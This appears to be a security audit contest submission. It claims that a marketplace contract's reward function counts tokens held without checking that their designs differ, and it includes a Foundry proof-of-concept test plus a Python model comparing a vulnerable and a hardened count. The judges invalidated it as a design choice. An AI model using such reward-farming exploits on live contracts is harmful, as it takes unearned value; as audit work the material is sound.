Beginner Friendly | Foundry | GameFi | 100 EXP
Submission Details
Severity: medium
Invalid

`MartenitsaMarketplace::collectReward` does not check whether the `MartenitsaToken`s a user holds are actually different.

Description: This contract provides a marketplace where users can buy and sell martenitsa tokens, with additional functionality for making presents, collecting rewards and managing listings. All users can participate in buying and collecting rewards, but only producers can list their tokens for sale and then sell them. `MartenitsaMarketplace::collectReward` lets users collect `HealthToken`s as a reward based on the number of `MartenitsaToken`s they own: for every 3 different `MartenitsaToken`s, the user receives 1 `HealthToken`. However, `MartenitsaMarketplace::collectReward` never checks whether those `MartenitsaToken`s are different; it only counts how many the user holds.

Impact: Malicious users can collect `HealthToken`s without owning three different tokens, since three copies of the same design are counted the same way as three distinct designs.

Proof Of Concept: Paste this test into your test folder and run it (it relies on the `chasy`, `bob`, `martenitsaToken`, `marketplace` and `healthToken` fixtures from the project's test setup).

```solidity
function test_collectReward() public {
    vm.startPrank(chasy);
    // Create three Martenitsa tokens with the very same design
    martenitsaToken.createMartenitsa("bracelet");
    martenitsaToken.createMartenitsa("bracelet");
    martenitsaToken.createMartenitsa("bracelet");
    marketplace.listMartenitsaForSale(0, 1 wei);
    marketplace.listMartenitsaForSale(1, 1 wei);
    marketplace.listMartenitsaForSale(2, 1 wei);
    martenitsaToken.approve(address(marketplace), 0);
    martenitsaToken.approve(address(marketplace), 1);
    martenitsaToken.approve(address(marketplace), 2);
    // chasy presents the Martenitsa tokens to bob
    marketplace.makePresent(bob, 0);
    marketplace.makePresent(bob, 1);
    marketplace.makePresent(bob, 2);
    vm.stopPrank();

    // bob collects the reward.
    // collectReward does not check whether the Martenitsa tokens are the same or not.
    // According to the documentation, every 3 different MartenitsaTokens earn 1 HealthToken,
    // but bob only holds 3 MartenitsaTokens named "bracelet", not 3 different ones.
    vm.startPrank(bob);
    marketplace.collectReward();
    vm.stopPrank();

    // bob is still paid a full HealthToken (18 decimals)
    assert(healthToken.balanceOf(bob) == 10 ** 18);
    console.log("balance of healthToken:", healthToken.balanceOf(bob));
    console.log("balance of martenitsaToken:", martenitsaToken.balanceOf(bob));
}
```
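To make the counting difference concrete, here is a small model of the reward rule as an added example; it is not code from the MartenitsaMarketplace contract or from this submission, and its storage layout (a per-user count of tokens already rewarded) is an assumption. It replays bob's three "bracelet" tokens against a balance-based count and against a count of distinct designs, which is what the documented rule actually describes.

```python
from dataclasses import dataclass, field

HEALTH_TOKEN = 10**18   # one HealthToken with 18 decimals, as the PoC asserts
TOKENS_PER_REWARD = 3   # "for every 3 different MartenitsaTokens, 1 HealthToken"


@dataclass
class Martenitsa:
    token_id: int
    design: str
    owner: str


@dataclass
class RewardModel:
    # Assumed accounting, not the real contract's storage: `rewarded` remembers
    # how many reward units a user has already been paid so that calling
    # collect twice does not pay for the same tokens again.
    tokens: list = field(default_factory=list)
    rewarded: dict = field(default_factory=dict)

    def owned(self, user: str) -> list:
        return [t for t in self.tokens if t.owner == user]

    def collect_reward_vulnerable(self, user: str) -> int:
        # Counts every token the user holds, so three "bracelet" tokens qualify.
        return self._pay(user, len(self.owned(user)))

    def collect_reward_hardened(self, user: str) -> int:
        # Counts distinct designs only, matching the documented rule.
        return self._pay(user, len({t.design for t in self.owned(user)}))

    def _pay(self, user: str, eligible: int) -> int:
        """Returns the amount of HealthToken minted by this call (0 if nothing new)."""
        already = self.rewarded.get(user, 0)
        new_units = eligible // TOKENS_PER_REWARD - already
        if new_units <= 0:
            return 0
        self.rewarded[user] = already + new_units
        return new_units * HEALTH_TOKEN


def reward_for(designs: list, hardened: bool) -> int:
    """Constructed scenario: user 'bob' holds one token per design in `designs`."""
    m = RewardModel([Martenitsa(i, d, "bob") for i, d in enumerate(designs)])
    collect = m.collect_reward_hardened if hardened else m.collect_reward_vulnerable
    return collect("bob")


if __name__ == "__main__":
    print("vulnerable, 3x bracelet:", reward_for(["bracelet"] * 3, hardened=False))
    print("hardened,   3x bracelet:", reward_for(["bracelet"] * 3, hardened=True))
```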
Updates

Lead Judging Commences

bube Lead Judge
over 1 year ago
Submission Judgement Published
Invalidated
Reason: Design choice
